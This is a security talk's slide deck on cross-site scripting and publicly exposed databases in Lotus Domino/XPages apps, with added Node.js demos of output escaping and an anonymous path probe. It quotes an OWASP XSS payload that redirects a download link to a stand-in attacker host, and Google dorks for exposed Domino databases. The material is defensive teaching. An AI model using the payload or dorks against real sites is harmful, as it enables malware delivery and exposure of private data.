Can your Xpage App Stand Up to Criminals?
Bernie Leung, MESA Technology
May 30, 2015
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
How to Secure Domino Server
Then what are these doing here?
Controlled Environment? … No More
Vulnerability
Topics:
1. XSS
2. Security by Obscurity
3. What can we do about it?
And demos: open your laptop and follow along.
Anatomy of XPages Web App
<xp: ..... >
Cross Site Scripting
Why is it Bad?
Demo.
XSS – non persistent
For example, consider a site that has a welcome notice "Welcome %username%" and a download link. Instead of a username you enter:
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
The server reflects the parameter into the page unescaped, so the browser runs the script, which rewrites the first link on the page to point at the attacker's executable. Nothing is stored; the victim only has to follow the crafted link.
*Sample copied from OWASP
XSS – persistent
User form input is stored by the application and later retrieved and rendered for other users, so the script runs in every visitor's browser with no crafted link required.
*Sample copied from OWASP
Fixing the Vulnerability
In JSP: include JSTL (JavaServer Pages Standard Tag Library) and output via <c:out value="${outputWords}"/> rather than printing the value raw; c:out HTML-escapes its value (escapeXml defaults to true), so "<script>" reaches the browser as text, not markup.
In Domino: add DominoValidateFramesetSRC=1 to NOTES.ini. Note that this setting only covers the frameset src case; data you render yourself in XPages must still be escaped at the point of output (xp:text escapes by default; do not set escape="false" on untrusted values).
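The reflected payload and the output-escaping fix above, as an added example that is not part of the original slides: a Node.js script that renders the "Welcome %username%" page two ways, raw concatenation (the bug) and HTML entity encoding at the point of output (what JSTL c:out and XPages' default escaping do), then checks whether the OWASP payload survives as markup. The page layout, the download link URL and the helper names are constructed for this demo.

```javascript
// Added example, not from the original slides or from OWASP.
// Node.js, no external packages. Run: node xss_demo.js

// Constructed payload with the same shape as the OWASP sample in the slides:
// it rewrites the first <a> on the page to point at an attacker-controlled host.
const PAYLOAD =
  '<script>window.onload = function() {' +
  'var AllLinks=document.getElementsByTagName("a");' +
  'AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>';

// The link a victim would be sent. encodeURIComponent is what a browser does
// to the value; the server decodes it back to the raw payload.
const ATTACK_URL =
  'http://example.com/index.php?user=' + encodeURIComponent(PAYLOAD);

// Minimal HTML entity encoder, equivalent in effect to JSTL <c:out> with
// escapeXml=true: after encoding, the browser treats the value as text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the user parameter is concatenated straight into HTML.
function renderVulnerable(user) {
  return '<html><body>Welcome ' + user +
    ' <a href="http://example.com/download">download</a></body></html>';
}

// Fixed rendering: the untrusted value is encoded at the point of output.
function renderFixed(user) {
  return '<html><body>Welcome ' + escapeHtml(user) +
    ' <a href="http://example.com/download">download</a></body></html>';
}

// What the server sees: the decoded ?user= parameter from the request URL.
function userFromUrl(url) {
  return new URL(url).searchParams.get('user') || '';
}

// Crude check used for the demo: does the response contain a script element
// that the developer did not write?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Render both variants for the attack URL and report whether the script survived.
function demo(url = ATTACK_URL) {
  const user = userFromUrl(url);
  return {
    vulnerableHasScript: containsScriptTag(renderVulnerable(user)),
    fixedHasScript: containsScriptTag(renderFixed(user)),
  };
}

console.log(demo());
```

For a benign username the two renderers produce identical HTML; only when the input contains markup characters does the encoded version differ, which is why escaping at output is the right place for the fix rather than trying to blacklist inputs.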
How Many other Libraries Do You Use?
Are you bringing in vulnerabilities?
Security by Obscurity
Another Common Vulnerability
Sensitive .nsf databases open to the public
Google is our frenemy:
inurl:/ibmsxpres
inurl:/names.nsf
inurl:/todo.nsf
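An added check, not from the original slides, for the exposure those dorks hunt for: a Node.js script that requests a list of well-known Domino database paths on your own server as an anonymous user (no cookies, no Authorization header) and reports which ones answer 200. It needs Node 18 or later for the global fetch, or you can pass your own fetch-compatible function. The path list and the hostname are constructed; extend the list with your own databases. A 401 or 403 means Domino challenged the anonymous user. With session (form-based) authentication Domino may instead redirect to, or directly serve, a login form, so redirects are reported separately and any 200 whose body is a login page should be confirmed by hand.

```javascript
// Added example, not from the original slides.
// Usage: node domino_probe.js https://your-domino-host/

// Constructed list of databases worth checking; names.nsf and todo.nsf are
// the ones the slides' search dorks look for.
const DEFAULT_PATHS = [
  '/names.nsf', '/todo.nsf', '/log.nsf', '/catalog.nsf',
  '/webadmin.nsf', '/domcfg.nsf', '/admin4.nsf',
];

// Classify a raw HTTP status. Only OPEN is a finding; REDIRECT needs a look
// because Domino session auth may redirect to a login form.
function classify(status) {
  if (status === 200) return 'OPEN';
  if (status === 401 || status === 403) return 'PROTECTED';
  if ([301, 302, 303, 307, 308].includes(status)) return 'REDIRECT';
  if (status === 404) return 'ABSENT';
  return 'OTHER(' + status + ')';
}

// Fetch each path anonymously. redirect: 'manual' keeps the 3xx status visible
// instead of silently following it to a login page that would answer 200.
async function probe(baseUrl, paths = DEFAULT_PATHS, fetchImpl = globalThis.fetch) {
  const results = [];
  for (const path of paths) {
    const url = new URL(path, baseUrl).toString();
    try {
      const res = await fetchImpl(url, { method: 'GET', redirect: 'manual' });
      results.push({ path, status: res.status, state: classify(res.status) });
    } catch (err) {
      // Network or TLS failure: record it rather than aborting the whole scan.
      results.push({ path, status: null, state: 'ERROR', detail: String(err.message) });
    }
  }
  return results;
}

// The paths an anonymous user could read outright.
function openDatabases(results) {
  return results.filter(r => r.state === 'OPEN').map(r => r.path);
}

// Stand-alone run only when a base URL is given on the command line.
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  probe(process.argv[2]).then(results => {
    for (const r of results) console.log(r.path.padEnd(16), r.state, r.status ?? r.detail);
    console.log('anonymously readable:', openDatabases(results));
  });
}
```

Run it from outside your network as well as inside; a database that is PROTECTED on the intranet can still be OPEN through a reverse proxy that strips the challenge. Anything reported OPEN should get its ACL's Anonymous entry set to No Access (or the database removed from the web server) before Google indexes it.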
DEMO
Keeping Up with the Bad Guys
IBM AppScan
Open Source
DEMO: How I Found the Vulnerabilities Using IBM AppScan
Thank You and Be Safe.
Contact Bernie Leung [email protected]